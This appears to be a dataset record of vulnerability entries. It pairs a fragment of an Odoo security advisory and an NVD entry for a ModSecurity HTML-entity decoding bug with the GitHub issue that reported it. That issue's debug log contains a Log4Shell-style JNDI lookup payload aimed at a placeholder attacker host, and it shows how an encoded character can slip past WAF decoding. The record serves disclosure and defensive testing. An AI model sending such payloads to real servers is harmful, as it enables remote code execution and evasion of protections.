**CVSS3 Vector**: [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
A remote authenticated attacker can craft malicious RPC queries and use the
resulting oracle to extract sensitive information, including through brute-force
techniques.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
Disabling the "Portal signup" option will prevent external users from signing
up on the portal, and therefore limit the attack exposure to current users of
the system
No complete workaround is available, it is strongly recommended to update to
the latest version as described below.
Odoo Cloud servers (SaaS and SH) have been patched as soon as the correction
was available.
## V. Solution
Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions:
https://www.odoo.com/r/update-instructions
## VI. Correction details
As of the date of this advisory, the latest versions of the following stable
series contain the correction:
- Odoo Community 17.0
- Odoo Enterprise 17.0
Other versions are not impacted.
| [SEC] CVE-2024-36259 - Improper access control in mail module of Odo... | https://api.github.com/repos/odoo/odoo/issues/199330/comments | 0 | 2025-02-25T19:06:35Z | 2025-02-25T19:06:36Z | https://github.com/odoo/odoo/issues/199330 | 2,879,312,217 | 199,330 | 6,544 |
CVE-2025-27110 | 2025-02-25T20:15:37.517 | Libmodsecurity is one component of the ModSecurity v3 project. The library codebase serves as an interface to ModSecurity Connectors taking in web traffic and applying traditional ModSecurity processing. A bug that exists only in Libmodsecurity3 version 3.0.13 means that, in 3.0.13, Libmodsecurity3 can't decode encoded HTML entities if they contains leading zeroes. Version 3.0.14 contains a fix. No known workarounds are available. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 7.9,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/owasp-modsecurity/ModSecurity/issues/3340"
},
{
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/owasp-modsecurity/ModSecurity/security/advisories/GHSA-42w7-rmv5-4x2j"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:trustwave:modsecurity:3.0.13:*:*:*:*:*:*:*",
"matchCriteriaId": "B30344C2-C12E-466B-BD92-A6B0A17EDC8E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"172"
] | 172 | https://github.com/owasp-modsecurity/ModSecurity/issues/3340 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"owasp-modsecurity",
"ModSecurity"
] | **Describe the bug**
The following string should be decoded into `{`: `{` but is instead decoded into `\x0000000000000000000000000000000000000000000000123;`.
**Logs and dumps**
Output of debug log:
```
[173942934834.266950] [/get] [9] Target value: "localhost" (Variable: REQUEST_HEADERS:Host)
[173942934834.266950] [/get] [9] T (0) t:urlDecodeUni: "${jndi:ldap://evil.om/w (1 characters omitted)"
[173942934834.266950] [/get] [9] T (0) t:jsDecode: "${jndi:ldap://evil.om/w (1 characters omitted)"
[173942934834.266950] [/get] [9] T (0) t:htmlEntityDecode: "$^@00000000000000000000000000000000000000000000123;jndi:ldap://evil.om/w}"
[173942934834.266950] [/get] [9] Target value: "$\x0000000000000000000000000000000000000000000000123;jndi:ldap://evil.om/w}" (Variable: REQUEST_HEADERS:User-Agent)
```
_Notice:_ Be careful to not leak any confidential information.
**To Reproduce**
Run CRS test `944150-23` with `owasp/modsecurity:4.11.0-nginx-202502070602`.
**Expected behavior**
The following string should be decoded into `{`: `{`.
**Server (please complete the following information):**
- ModSecurity version (and connector): ModSecurity v3.0.12 with nginx-connector v1.0.3
- WebServer: nginx 1.27.3
- OS (and distro): macOS
**Rule Set (please complete the following information):**
- CRS v4.11.0
**Additional context**
The changes in v3.0.12 appear to have broken entity decoding. The test works with v3.0.11.
| HTML entity decoding fails to decode some exotic values | https://api.github.com/repos/owasp-modsecurity/ModSecurity/issues/3340/comments | 2 | 2025-02-13T06:57:32Z | 2025-03-10T13:08:46Z | https://github.com/owasp-modsecurity/ModSecurity/issues/3340 | 2,850,144,963 | 3,340 | 6,545 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.